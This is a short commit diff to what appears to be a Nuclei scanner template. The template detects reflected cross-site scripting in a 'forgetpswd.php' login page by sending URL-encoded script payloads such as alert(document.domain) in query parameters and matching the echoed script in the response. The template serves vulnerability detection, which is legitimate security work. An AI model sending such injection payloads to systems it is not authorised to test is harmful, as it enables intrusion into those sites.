minor update

patch-1
sandeep 2021-04-11 17:24:54 +05:30
parent cdac8b34a6
commit d96746d193
1 changed files with 8 additions and 3 deletions

View File

@ -10,16 +10,21 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'
- '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(/XSS/)</script>'
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
- 200